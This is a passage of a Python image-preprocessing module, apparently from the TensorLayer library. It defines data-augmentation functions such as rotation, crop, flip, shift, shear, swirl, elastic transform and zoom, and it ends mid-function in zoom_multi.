#! /usr/bin/python
# -*- coding: utf-8 -*-
import copy
import threading
import time
import numpy as np
import tensorlayer as tl
import scipy
import scipy.ndimage as ndi
from scipy import linalg
from scipy.ndimage.filters import gaussian_filter
from scipy.ndimage.interpolation import map_coordinates
import skimage
from skimage import exposure
from skimage import transform
from skimage.morphology import disk
from skimage.morphology import erosion as _erosion
from skimage.morphology import binary_dilation as _binary_dilation
from skimage.morphology import binary_erosion as _binary_erosion
from six.moves import range
import PIL
# linalg https://docs.scipy.org/doc/scipy/reference/linalg.html
# ndimage https://docs.scipy.org/doc/scipy/reference/ndimage.html
__all__ = [
'threading_data',
'rotation',
'rotation_multi',
'crop',
'crop_multi',
'flip_axis',
'flip_axis_multi',
'shift',
'shift_multi',
'shear',
'shear_multi',
'shear2',
'shear_multi2',
'swirl',
'swirl_multi',
'elastic_transform',
'elastic_transform_multi',
'zoom',
'zoom_multi',
'brightness',
'brightness_multi',
'illumination',
'rgb_to_hsv',
'hsv_to_rgb',
'adjust_hue',
'imresize',
'pixel_value_scale',
'samplewise_norm',
'featurewise_norm',
'get_zca_whitening_principal_components_img',
'zca_whitening',
'channel_shift',
'channel_shift_multi',
'drop',
'transform_matrix_offset_center',
'apply_transform',
'projective_transform_by_points',
'array_to_img',
'find_contours',
'pt2map',
'binary_dilation',
'dilation',
'binary_erosion',
'erosion',
'obj_box_coords_rescale',
'obj_box_coord_rescale',
'obj_box_coord_scale_to_pixelunit',
'obj_box_coord_centroid_to_upleft_butright',
'obj_box_coord_upleft_butright_to_centroid',
'obj_box_coord_centroid_to_upleft',
'obj_box_coord_upleft_to_centroid',
'parse_darknet_ann_str_to_list',
'parse_darknet_ann_list_to_cls_box',
'obj_box_left_right_flip',
'obj_box_imresize',
'obj_box_crop',
'obj_box_shift',
'obj_box_zoom',
'pad_sequences',
'remove_pad_sequences',
'process_sequences',
'sequences_add_start_id',
'sequences_add_end_id',
'sequences_add_end_id_after_pad',
'sequences_get_mask',
]
def threading_data(data=None, fn=None, thread_count=None, **kwargs):
"""Process a batch of data by given function by threading.
Usually be used for data augmentation.
Parameters
-----------
data : numpy.array or others
The data to be processed.
thread_count : int
The number of threads to use.
fn : function
The function for data processing.
more args : the args for `fn`
        See Examples below.
Examples
--------
Process images.
>>> images, _, _, _ = tl.files.load_cifar10_dataset(shape=(-1, 32, 32, 3))
>>> images = tl.prepro.threading_data(images[0:32], tl.prepro.zoom, zoom_range=[0.5, 1])
Customized image preprocessing function.
>>> def distort_img(x):
>>> x = tl.prepro.flip_axis(x, axis=0, is_random=True)
>>> x = tl.prepro.flip_axis(x, axis=1, is_random=True)
>>> x = tl.prepro.crop(x, 100, 100, is_random=True)
>>> return x
>>> images = tl.prepro.threading_data(images, distort_img)
Process images and masks together (usually used for image segmentation).
>>> X, Y --> [batch_size, row, col, 1]
>>> data = tl.prepro.threading_data([_ for _ in zip(X, Y)], tl.prepro.zoom_multi, zoom_range=[0.5, 1], is_random=True)
data --> [batch_size, 2, row, col, 1]
>>> X_, Y_ = data.transpose((1,0,2,3,4))
X_, Y_ --> [batch_size, row, col, 1]
>>> tl.vis.save_image(X_, 'images.png')
>>> tl.vis.save_image(Y_, 'masks.png')
Process images and masks together by using ``thread_count``.
>>> X, Y --> [batch_size, row, col, 1]
>>> data = tl.prepro.threading_data(X, tl.prepro.zoom_multi, 8, zoom_range=[0.5, 1], is_random=True)
data --> [batch_size, 2, row, col, 1]
>>> X_, Y_ = data.transpose((1,0,2,3,4))
X_, Y_ --> [batch_size, row, col, 1]
>>> tl.vis.save_image(X_, 'after.png')
>>> tl.vis.save_image(Y_, 'before.png')
Customized function for processing images and masks together.
>>> def distort_img(data):
>>> x, y = data
>>> x, y = tl.prepro.flip_axis_multi([x, y], axis=0, is_random=True)
>>> x, y = tl.prepro.flip_axis_multi([x, y], axis=1, is_random=True)
>>> x, y = tl.prepro.crop_multi([x, y], 100, 100, is_random=True)
>>> return x, y
>>> X, Y --> [batch_size, row, col, channel]
>>> data = tl.prepro.threading_data([_ for _ in zip(X, Y)], distort_img)
>>> X_, Y_ = data.transpose((1,0,2,3,4))
Returns
-------
list or numpy.array
The processed results.
References
----------
- `python queue <https://pymotw.com/2/Queue/index.html#module-Queue>`__
- `run with limited queue <http://effbot.org/librarybook/queue.htm>`__
"""
def apply_fn(results, i, data, kwargs):
results[i] = fn(data, **kwargs)
if thread_count is None:
results = [None] * len(data)
threads = []
# for i in range(len(data)):
# t = threading.Thread(name='threading_and_return', target=apply_fn, args=(results, i, data[i], kwargs))
for i, d in enumerate(data):
t = threading.Thread(name='threading_and_return', target=apply_fn, args=(results, i, d, kwargs))
t.start()
threads.append(t)
else:
divs = np.linspace(0, len(data), thread_count + 1)
divs = np.round(divs).astype(int)
results = [None] * thread_count
threads = []
for i in range(thread_count):
t = threading.Thread(
name='threading_and_return', target=apply_fn, args=(results, i, data[divs[i]:divs[i + 1]], kwargs)
)
t.start()
threads.append(t)
for t in threads:
t.join()
if thread_count is None:
try:
return np.asarray(results)
except Exception:
return results
else:
return np.concatenate(results)
def rotation(
x, rg=20, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0., order=1
):
"""Rotate an image randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
rg : int or float
Degree to rotate, usually 0 ~ 180.
is_random : boolean
If True, randomly rotate. Default is False.
row_index col_index and channel_index : int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode=`constant`. Default is 0.0
order : int
The order of interpolation. The order has to be in the range 0-5. See ``tl.prepro.apply_transform`` and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
Examples
---------
>>> x --> [row, col, 1]
>>> x = tl.prepro.rotation(x, rg=40, is_random=False)
>>> tl.vis.save_image(x, 'im.png')
"""
if is_random:
theta = np.pi / 180 * np.random.uniform(-rg, rg)
else:
theta = np.pi / 180 * rg
rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0], [np.sin(theta), np.cos(theta), 0], [0, 0, 1]])
h, w = x.shape[row_index], x.shape[col_index]
transform_matrix = transform_matrix_offset_center(rotation_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
return x
def rotation_multi(
x, rg=20, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0., order=1
):
"""Rotate multiple images with the same arguments, randomly or non-randomly.
Usually used for image segmentation, where x=[X, Y] and X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.rotation``.
Returns
-------
numpy.array
A list of processed images.
Examples
--------
>>> x, y --> [row, col, 1] greyscale
>>> x, y = tl.prepro.rotation_multi([x, y], rg=90, is_random=False)
"""
if is_random:
theta = np.pi / 180 * np.random.uniform(-rg, rg)
else:
theta = np.pi / 180 * rg
rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0], [np.sin(theta), np.cos(theta), 0], [0, 0, 1]])
h, w = x[0].shape[row_index], x[0].shape[col_index]
transform_matrix = transform_matrix_offset_center(rotation_matrix, h, w)
results = []
for data in x:
results.append(apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order))
return np.asarray(results)
# crop
def crop(x, wrg, hrg, is_random=False, row_index=0, col_index=1):
"""Randomly or centrally crop an image.
Parameters
----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
wrg : int
Size of width.
hrg : int
Size of height.
is_random : boolean,
If True, randomly crop, else central crop. Default is False.
row_index: int
index of row.
col_index: int
index of column.
Returns
-------
numpy.array
A processed image.
"""
h, w = x.shape[row_index], x.shape[col_index]
if (h <= hrg) or (w <= wrg):
raise AssertionError("The size of cropping should smaller than the original image")
if is_random:
h_offset = int(np.random.uniform(0, h - hrg) - 1)
w_offset = int(np.random.uniform(0, w - wrg) - 1)
# tl.logging.info(h_offset, w_offset, x[h_offset: hrg+h_offset ,w_offset: wrg+w_offset].shape)
return x[h_offset:hrg + h_offset, w_offset:wrg + w_offset]
else: # central crop
h_offset = int(np.floor((h - hrg) / 2.))
w_offset = int(np.floor((w - wrg) / 2.))
h_end = h_offset + hrg
w_end = w_offset + wrg
return x[h_offset:h_end, w_offset:w_end]
# old implementation
# h_offset = (h - hrg)/2
# w_offset = (w - wrg)/2
# tl.logging.info(x[h_offset: h-h_offset ,w_offset: w-w_offset].shape)
# return x[h_offset: h-h_offset ,w_offset: w-w_offset]
# central crop
def crop_multi(x, wrg, hrg, is_random=False, row_index=0, col_index=1):
"""Randomly or centrally crop multiple images.
Parameters
----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.crop``.
Returns
-------
numpy.array
A list of processed images.
"""
h, w = x[0].shape[row_index], x[0].shape[col_index]
if (h <= hrg) or (w <= wrg):
raise AssertionError("The size of cropping should smaller than the original image")
if is_random:
h_offset = int(np.random.uniform(0, h - hrg) - 1)
w_offset = int(np.random.uniform(0, w - wrg) - 1)
results = []
for data in x:
results.append(data[h_offset:hrg + h_offset, w_offset:wrg + w_offset])
return np.asarray(results)
else:
# central crop
h_offset = int(np.floor((h - hrg) / 2.))
w_offset = int(np.floor((w - wrg) / 2.))
results = []
for data in x:
results.append(data[h_offset:h_offset + hrg, w_offset:w_offset + wrg])
return np.asarray(results)
# flip
def flip_axis(x, axis=1, is_random=False):
"""Flip the axis of an image, such as flip left and right, up and down, randomly or non-randomly,
Parameters
----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
axis : int
Which axis to flip.
- 0, flip up and down
- 1, flip left and right
- 2, flip channel
is_random : boolean
If True, randomly flip. Default is False.
Returns
-------
numpy.array
A processed image.
"""
if is_random:
factor = np.random.uniform(-1, 1)
if factor > 0:
x = np.asarray(x).swapaxes(axis, 0)
x = x[::-1, ...]
x = x.swapaxes(0, axis)
return x
else:
return x
else:
x = np.asarray(x).swapaxes(axis, 0)
x = x[::-1, ...]
x = x.swapaxes(0, axis)
return x
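# A minimal usage sketch for ``flip_axis`` (hedged example; ``im`` is assumed to be an
# image array of shape [row, col, channel] loaded elsewhere):
#
# >>> im_ud = flip_axis(im, axis=0, is_random=False)   # deterministic up/down flip
# >>> im_lr = flip_axis(im, axis=1, is_random=True)    # left/right flip applied with probability ~0.5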
def flip_axis_multi(x, axis, is_random=False):
"""Flip the axises of multiple images together, such as flip left and right, up and down, randomly or non-randomly,
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.flip_axis``.
Returns
-------
numpy.array
A list of processed images.
"""
if is_random:
factor = np.random.uniform(-1, 1)
if factor > 0:
# x = np.asarray(x).swapaxes(axis, 0)
# x = x[::-1, ...]
# x = x.swapaxes(0, axis)
# return x
results = []
for data in x:
data = np.asarray(data).swapaxes(axis, 0)
data = data[::-1, ...]
data = data.swapaxes(0, axis)
results.append(data)
return np.asarray(results)
else:
return np.asarray(x)
else:
# x = np.asarray(x).swapaxes(axis, 0)
# x = x[::-1, ...]
# x = x.swapaxes(0, axis)
# return x
results = []
for data in x:
data = np.asarray(data).swapaxes(axis, 0)
data = data[::-1, ...]
data = data.swapaxes(0, axis)
results.append(data)
return np.asarray(results)
# shift
def shift(
x, wrg=0.1, hrg=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shift an image randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
wrg : float
Percentage of shift in axis x, usually -0.25 ~ 0.25.
hrg : float
Percentage of shift in axis y, usually -0.25 ~ 0.25.
is_random : boolean
If True, randomly shift. Default is False.
row_index col_index and channel_index : int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0.
order : int
The order of interpolation. The order has to be in the range 0-5. See ``tl.prepro.apply_transform`` and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
"""
h, w = x.shape[row_index], x.shape[col_index]
if is_random:
tx = np.random.uniform(-hrg, hrg) * h
ty = np.random.uniform(-wrg, wrg) * w
else:
tx, ty = hrg * h, wrg * w
translation_matrix = np.array([[1, 0, tx], [0, 1, ty], [0, 0, 1]])
transform_matrix = translation_matrix # no need to do offset
x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
return x
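# A minimal usage sketch for ``shift`` (hedged example; ``im`` is assumed to have shape [row, col, channel]):
#
# >>> im_shifted = shift(im, wrg=0.1, hrg=0.1, is_random=False)   # fixed shift of ~10% of width/height
# >>> im_jittered = shift(im, wrg=0.1, hrg=0.1, is_random=True)   # random offset drawn from [-10%, 10%]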
def shift_multi(
x, wrg=0.1, hrg=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shift images with the same arguments, randomly or non-randomly.
Usually used for image segmentation, where x=[X, Y] and X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.shift``.
Returns
-------
numpy.array
A list of processed images.
"""
h, w = x[0].shape[row_index], x[0].shape[col_index]
if is_random:
tx = np.random.uniform(-hrg, hrg) * h
ty = np.random.uniform(-wrg, wrg) * w
else:
tx, ty = hrg * h, wrg * w
translation_matrix = np.array([[1, 0, tx], [0, 1, ty], [0, 0, 1]])
transform_matrix = translation_matrix # no need to do offset
results = []
for data in x:
results.append(apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order))
return np.asarray(results)
# shear
def shear(
x, intensity=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shear an image randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
intensity : float
Percentage of shear, usually -0.5 ~ 0.5 (is_random==True), 0 ~ 0.5 (is_random==False),
you can have a quick try by shear(X, 1).
is_random : boolean
If True, randomly shear. Default is False.
row_index col_index and channel_index : int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0.
order : int
The order of interpolation. The order has to be in the range 0-5. See ``tl.prepro.apply_transform`` and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
References
-----------
- `Affine transformation <https://uk.mathworks.com/discovery/affine-transformation.html>`__
"""
if is_random:
shear = np.random.uniform(-intensity, intensity)
else:
shear = intensity
shear_matrix = np.array([[1, -np.sin(shear), 0], [0, np.cos(shear), 0], [0, 0, 1]])
h, w = x.shape[row_index], x.shape[col_index]
transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
return x
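# A minimal usage sketch for ``shear`` (hedged example; ``im`` is assumed to have shape [row, col, channel]):
#
# >>> im_sheared = shear(im, intensity=0.2, is_random=False)   # fixed shear of 0.2
# >>> im_random = shear(im, intensity=0.2, is_random=True)     # shear drawn uniformly from [-0.2, 0.2]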
def shear_multi(
x, intensity=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shear images with the same arguments, randomly or non-randomly.
Usually used for image segmentation, where x=[X, Y] and X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.shear``.
Returns
-------
numpy.array
A list of processed images.
"""
if is_random:
shear = np.random.uniform(-intensity, intensity)
else:
shear = intensity
shear_matrix = np.array([[1, -np.sin(shear), 0], [0, np.cos(shear), 0], [0, 0, 1]])
h, w = x[0].shape[row_index], x[0].shape[col_index]
transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
results = []
for data in x:
results.append(apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order))
return np.asarray(results)
def shear2(
x, shear=(0.1, 0.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shear an image randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
shear : tuple of two floats
Percentage of shear for height and width direction (0, 1).
is_random : boolean
If True, randomly shear. Default is False.
row_index col_index and channel_index : int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0.
order : int
The order of interpolation. The order has to be in the range 0-5. See ``tl.prepro.apply_transform`` and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
References
-----------
- `Affine transformation <https://uk.mathworks.com/discovery/affine-transformation.html>`__
"""
if len(shear) != 2:
raise AssertionError(
"shear should be tuple of 2 floats, or you want to use tl.prepro.shear rather than tl.prepro.shear2 ?"
)
if is_random:
# `shear` may be a tuple (the default), so build a new pair instead of assigning items in place
shear = (np.random.uniform(-shear[0], shear[0]), np.random.uniform(-shear[1], shear[1]))
shear_matrix = np.array([[1, shear[0], 0], [shear[1], 1, 0], [0, 0, 1]])
h, w = x.shape[row_index], x.shape[col_index]
transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
return x
def shear_multi2(
x, shear=(0.1, 0.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shear images with the same arguments, randomly or non-randomly.
Usually used for image segmentation, where x=[X, Y] and X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.shear2``.
Returns
-------
numpy.array
A list of processed images.
"""
if len(shear) != 2:
raise AssertionError(
"shear should be tuple of 2 floats, or you want to use tl.prepro.shear_multi rather than tl.prepro.shear_multi2 ?"
)
if is_random:
# `shear` may be a tuple (the default), so build a new pair instead of assigning items in place
shear = (np.random.uniform(-shear[0], shear[0]), np.random.uniform(-shear[1], shear[1]))
shear_matrix = np.array([[1, shear[0], 0], [shear[1], 1, 0], [0, 0, 1]])
h, w = x[0].shape[row_index], x[0].shape[col_index]
transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
results = []
for data in x:
results.append(apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order))
return np.asarray(results)
# swirl
def swirl(
x, center=None, strength=1, radius=100, rotation=0, output_shape=None, order=1, mode='constant', cval=0,
clip=True, preserve_range=False, is_random=False
):
"""Swirl an image randomly or non-randomly, see `scikit-image swirl API <http://scikit-image.org/docs/dev/api/skimage.transform.html#skimage.transform.swirl>`__
and `example <http://scikit-image.org/docs/dev/auto_examples/plot_swirl.html>`__.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
center : tuple or 2 int or None
Center coordinate of transformation (optional).
strength : float
The amount of swirling applied.
radius : float
The extent of the swirl in pixels. The effect dies out rapidly beyond radius.
rotation : float
Additional rotation applied to the image, usually [0, 360], relates to center.
output_shape : tuple of 2 int or None
Shape of the output image generated (height, width). By default the shape of the input image is preserved.
order : int, optional
The order of the spline interpolation, default is 1. The order has to be in the range 0-5. See skimage.transform.warp for detail.
mode : str
One of `constant` (default), `edge`, `symmetric` `reflect` and `wrap`.
Points outside the boundaries of the input are filled according to the given mode, with `constant` used as the default. Modes match the behaviour of numpy.pad.
cval : float
Used in conjunction with mode `constant`, the value outside the image boundaries.
clip : boolean
Whether to clip the output to the range of values of the input image. This is enabled by default, since higher order interpolation may produce values outside the given input range.
preserve_range : boolean
Whether to keep the original range of values. Otherwise, the input image is converted according to the conventions of img_as_float.
is_random : boolean,
If True, random swirl. Default is False.
- random center = [(0 ~ x.shape[0]), (0 ~ x.shape[1])]
- random strength = [0, strength]
- random radius = [1e-10, radius]
- random rotation = [-rotation, rotation]
Returns
-------
numpy.array
A processed image.
Examples
---------
>>> x --> [row, col, 1] greyscale
>>> x = tl.prepro.swirl(x, strength=4, radius=100)
"""
if radius == 0:
raise AssertionError("Invalid radius value")
rotation = np.pi / 180 * rotation
if is_random:
center_h = int(np.random.uniform(0, x.shape[0]))
center_w = int(np.random.uniform(0, x.shape[1]))
center = (center_h, center_w)
strength = np.random.uniform(0, strength)
radius = np.random.uniform(1e-10, radius)
rotation = np.random.uniform(-rotation, rotation)
max_v = np.max(x)
if max_v > 1: # Note: the input of this fn should be [-1, 1], rescale is required.
x = x / max_v
swirled = skimage.transform.swirl(
x, center=center, strength=strength, radius=radius, rotation=rotation, output_shape=output_shape, order=order,
mode=mode, cval=cval, clip=clip, preserve_range=preserve_range
)
if max_v > 1:
swirled = swirled * max_v
return swirled
def swirl_multi(
x, center=None, strength=1, radius=100, rotation=0, output_shape=None, order=1, mode='constant', cval=0,
clip=True, preserve_range=False, is_random=False
):
"""Swirl multiple images with the same arguments, randomly or non-randomly.
Usually used for image segmentation, where x=[X, Y] and X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.swirl``.
Returns
-------
numpy.array
A list of processed images.
"""
if radius == 0:
raise AssertionError("Invalid radius value")
rotation = np.pi / 180 * rotation
if is_random:
center_h = int(np.random.uniform(0, x[0].shape[0]))
center_w = int(np.random.uniform(0, x[0].shape[1]))
center = (center_h, center_w)
strength = np.random.uniform(0, strength)
radius = np.random.uniform(1e-10, radius)
rotation = np.random.uniform(-rotation, rotation)
results = []
for data in x:
max_v = np.max(data)
if max_v > 1: # Note: the input of this fn should be [-1, 1], rescale is required.
data = data / max_v
swirled = skimage.transform.swirl(
data, center=center, strength=strength, radius=radius, rotation=rotation, output_shape=output_shape,
order=order, mode=mode, cval=cval, clip=clip, preserve_range=preserve_range
)
if max_v > 1:
swirled = swirled * max_v
results.append(swirled)
return np.asarray(results)
# elastic_transform
def elastic_transform(x, alpha, sigma, mode="constant", cval=0, is_random=False):
"""Elastic transformation for image as described in `[Simard2003] <http://deeplearning.cs.cmu.edu/pdfs/Simard.pdf>`__.
Parameters
-----------
x : numpy.array
A greyscale image.
alpha : float
Alpha value for elastic transformation.
sigma : float or sequence of float
The smaller the sigma, the more transformation. Standard deviation for Gaussian kernel. The standard deviations of the Gaussian filter are given for each axis as a sequence, or as a single number, in which case it is equal for all axes.
mode : str
See `scipy.ndimage.filters.gaussian_filter <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.filters.gaussian_filter.html>`__. Default is `constant`.
cval : float,
Used in conjunction with `mode` of `constant`, the value outside the image boundaries.
is_random : boolean
Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
>>> x = tl.prepro.elastic_transform(x, alpha=x.shape[1]*3, sigma=x.shape[1]*0.07)
References
------------
- `Github <https://gist.github.com/chsasank/4d8f68caf01f041a6453e67fb30f8f5a>`__.
- `Kaggle <https://www.kaggle.com/pscion/ultrasound-nerve-segmentation/elastic-transform-for-data-augmentation-0878921a>`__
"""
if is_random is False:
random_state = np.random.RandomState(None)
else:
random_state = np.random.RandomState(int(time.time()))
#
is_3d = False
if len(x.shape) == 3 and x.shape[-1] == 1:
x = x[:, :, 0]
is_3d = True
elif len(x.shape) == 3 and x.shape[-1] != 1:
raise Exception("Only support greyscale image")
if len(x.shape) != 2:
raise AssertionError("input should be grey-scale image")
shape = x.shape
dx = gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma, mode=mode, cval=cval) * alpha
dy = gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma, mode=mode, cval=cval) * alpha
x_, y_ = np.meshgrid(np.arange(shape[0]), np.arange(shape[1]), indexing='ij')
indices = np.reshape(x_ + dx, (-1, 1)), np.reshape(y_ + dy, (-1, 1))
if is_3d:
return map_coordinates(x, indices, order=1).reshape((shape[0], shape[1], 1))
else:
return map_coordinates(x, indices, order=1).reshape(shape)
def elastic_transform_multi(x, alpha, sigma, mode="constant", cval=0, is_random=False):
"""Elastic transformation for images as described in `[Simard2003] <http://deeplearning.cs.cmu.edu/pdfs/Simard.pdf>`__.
Parameters
-----------
x : list of numpy.array
List of greyscale images.
others : args
See ``tl.prepro.elastic_transform``.
Returns
-------
numpy.array
A list of processed images.
"""
if is_random is False:
random_state = np.random.RandomState(None)
else:
random_state = np.random.RandomState(int(time.time()))
shape = x[0].shape
if len(shape) == 3:
shape = (shape[0], shape[1])
new_shape = random_state.rand(*shape)
results = []
for data in x:
is_3d = False
if len(data.shape) == 3 and data.shape[-1] == 1:
data = data[:, :, 0]
is_3d = True
elif len(data.shape) == 3 and data.shape[-1] != 1:
raise Exception("Only support greyscale image")
if len(data.shape) != 2:
raise AssertionError("input should be grey-scale image")
dx = gaussian_filter((new_shape * 2 - 1), sigma, mode=mode, cval=cval) * alpha
dy = gaussian_filter((new_shape * 2 - 1), sigma, mode=mode, cval=cval) * alpha
x_, y_ = np.meshgrid(np.arange(shape[0]), np.arange(shape[1]), indexing='ij')
indices = np.reshape(x_ + dx, (-1, 1)), np.reshape(y_ + dy, (-1, 1))
# tl.logging.info(data.shape)
if is_3d:
results.append(map_coordinates(data, indices, order=1).reshape((shape[0], shape[1], 1)))
else:
results.append(map_coordinates(data, indices, order=1).reshape(shape))
return np.asarray(results)
# zoom
def zoom(
x, zoom_range=(0.9, 1.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
cval=0., order=1
):
"""Zoom in and out of a single image, randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
zoom_range : list or tuple
Zoom range for height and width.
- If is_random=False, (h, w) are the fixed zoom factors for the row and column axes; a factor smaller than one zooms in.
- If is_random=True, (h, w) are the (min, max) of the random zoom factor drawn for x and y independently, e.g. (0.5, 1) zooms in 1~2 times.
is_random : boolean
If True, randomly zoom. Default is False.
row_index col_index and channel_index : int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0.
order : int
The order of interpolation. The order has to be in the range 0-5. See ``tl.prepro.apply_transform`` and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
"""
if len(zoom_range) != 2:
raise Exception('zoom_range should be a tuple or list of two floats. ' 'Received arg: ', zoom_range)
if is_random:
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
tl.logging.info(" random_zoom : not zoom in/out")
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
else:
zx, zy = zoom_range
# tl.logging.info(zx, zy)
zoom_matrix = np.array([[zx, 0, 0], [0, zy, 0], [0, 0, 1]])
h, w = x.shape[row_index], x.shape[col_index]
transform_matrix = transform_matrix_offset_center(zoom_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
return x
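# A minimal usage sketch for ``zoom`` (hedged example; ``im`` is assumed to have shape [row, col, channel]):
#
# >>> im_in = zoom(im, zoom_range=(0.8, 0.8), is_random=False)    # fixed zoom-in (factor < 1 zooms in)
# >>> im_rand = zoom(im, zoom_range=(0.8, 1.2), is_random=True)   # random factor drawn per axis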
def zoom_multi(
x, zoom_range=(0.9, 1.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
cval=0., order=1
):
"""Zoom in and out of images with the same arguments, randomly or non-randomly.
Usually used for image segmentation, where x=[X, Y] and X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.zoom``.
Returns
-------
numpy.array
A list of processed images.
"""
if len(zoom_range) != 2:
raise Exception('zoom_range should be a tuple or list of two floats. ' 'Received arg: ', zoom_range)
if is_random:
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
tl.logging.info(" random_zoom : not zoom in/out")
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
else:
zx, zy = zoom_range
zoom_matrix = np.array([[zx, 0, 0], [0, zy, 0], [0, 0, 1]])
h, w = x[0].shape[row_index], x[0].shape[col_index]
transform_matrix = transform_matrix_offset_center(zoom_matrix, h, w)
# x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval)
# return x
results = []
for data in x:
